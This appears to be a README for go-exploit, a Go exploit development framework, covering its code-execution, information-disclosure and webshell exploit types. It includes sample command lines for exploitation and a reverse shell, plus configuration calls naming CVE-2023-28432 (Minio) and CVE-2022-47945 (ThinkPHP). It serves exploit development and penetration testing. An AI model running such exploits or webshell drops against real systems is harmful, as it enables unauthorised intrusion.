go-exploit: Go Exploit Framework

Exploit development Framework

go-exploit: Go Exploit Framework

go-exploit is an exploit development framework for Go. The framework helps exploit developers create small, self-contained, portable, and consistent exploits.

Many proof-of-concept exploits rely on interpreted languages with complicated packaging systems. They implement wildly differing user interfaces and have limited ability to be executed within a target network. Some exploits are integrated into massive frameworks that are burdened by years of features and dependencies which overwhelm developers and hinder the attacker’s ability to deploy the exploits from unconventional locations.

Exploit development Framework

To overcome these challenges, go-exploit offers a lightweight framework with minimal dependencies, written in Go—a language renowned for its portability and cross-compilation capabilities. The framework strikes a balance between simplicity for rapid proof-of-concept development and the inclusion of sophisticated built-in features for operational use.

This project is developed and maintained by VulnCheck.

The go-exploit framework currently supports three exploit types. These types determine how the command-line interface accepts arguments and defines the post-exploitation behavior. The three exploit types are defined in config/config.go:

  1. CodeExecution
  2. InformationDisclosure
  3. Webshell

To configure the exploit type in the exploit’s main function, you can use the config.New function is as follows:

Examples

Code Execution

The Code Execution exploit type assumes that the attacker is attempting to exploit a remote target. Depending on the configured command and control (C2) method, the attacker may need to provide local host information or a bind port. Here is an example of invoking verification, version check, and exploitation for a reverse shell using the Code Execution exploit type:

./exploit -a -v -c -e -rhost 10.12.70.247 -rport 80 -lhost 10.12.70.252 -lport 1270

Information Disclosure

The Information Disclosure exploit type assumes that there is some type of information leak that does not immediately result in code execution. No command and control (C2) is configured for this exploit type. In the main function, it would look like this:

conf := config.New(config.InformationDisclosure, []c2.Impl{}, “Minio API”, “CVE-2023-28432”, 9000)

Depending on the specific exploit, you may need to provide a local host and port using the -lhost and -lport arguments. Here is an example of invoking verification, version check, and exploitation using the Information Disclosure exploit type:

./exploit -v -c -e -s -rhost 10.12.70.247 -rport 443

Webshell

The WebShell exploit type assumes that the exploit will drop a webshell on the remote host. No command and control (C2) is configured for this exploit type. In the main function, it would look like this:

conf := config.New(config.Webshell, []c2.Impl{}, “ThinkPHP”, “CVE-2022-47945”, 8080)

Here is an example of invoking verification, version check, and exploitation using the WebShell exploit type:

./exploit -v -c -e -s -rhost 10.12.70.247 -rport 443

Install

Copyright 2023 VulnCheck Inc